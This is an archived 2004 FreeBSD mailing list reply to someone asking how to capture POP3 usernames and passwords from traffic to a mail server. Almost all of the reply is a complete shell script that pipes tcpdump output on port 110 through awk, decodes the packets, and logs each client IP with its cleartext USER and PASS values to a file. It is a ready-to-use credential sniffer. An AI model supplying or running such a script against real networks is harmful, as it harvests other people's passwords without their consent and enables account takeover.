Re: tcpdump for sniffing POP3 -- methods ?

freebsd-lists_at_albury.net.au
Date: 04/13/04

  • Next message: listguru_at_fatcity.com: "Response to your ListGuru session [MsgId AA20040413.143401.5]" 
    Date: Wed, 14 Apr 2004 06:10:49 +1000 (EST)
To: John Fox <readbsd@mind.net>

    On Tue, 13 Apr 2004, John Fox wrote:

    > 2) Obtain them by sniffing the POP3 traffic being sent
    > to the Imail server.
    >
    > I think #2 is the only possibility, and I haven't made much
    > use of tcpdump, so while I do know how to run it and
    > specify a host to listen to, I've no idea how to isolate
    > the clear-text stuff (containing the usernames and passwords)
    > from all the other traffic.
    >
    > Any suggestions would be greatly appreciated.

    I had to do this some years back, here's the rude, crude and unattractive
    script I wrote then:

    # cat sniff.pop.passwords

    #! /bin/sh

    log=sniffed.passwords.log
    mailhost="mail" # Hostname of whichever host receives your incomming mail

    tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
            BEGIN{ lut="123456789abcdef" }
            />/ { IP=$2; n=0; len=0; c=""; }
            {
                if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1));
                if(++n>3 && len>20)
                {
                    for(i=(n==4)*4+1; i<=NF; i++)
                    c=sprintf("%s%c%c",c,
                            index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)),
                            index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1)))
                    if(length(c) >= len-40)
                    {
                            sub("\.[0-9]*$","",IP);
                            v=substr(c,6); gsub("[^a-zA-Z0-9]","",v)
                            if(substr(c,1,5)=="USER ") usr[IP]=v;
                            if(substr(c,1,5)=="PASS " && usr[IP]) {
                                    printf("%s %-16.16s %10s - %s\n", strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v);
                                    usr[IP]=""
                            }
                    }
                }
            }'

    _______________________________________________
    freebsd-isp@freebsd.org mailing list
    http://lists.freebsd.org/mailman/listinfo/freebsd-isp
    To unsubscribe, send any mail to "freebsd-isp-unsubscribe@freebsd.org"

  • Next message: listguru_at_fatcity.com: "Response to your ListGuru session [MsgId AA20040413.143401.5]"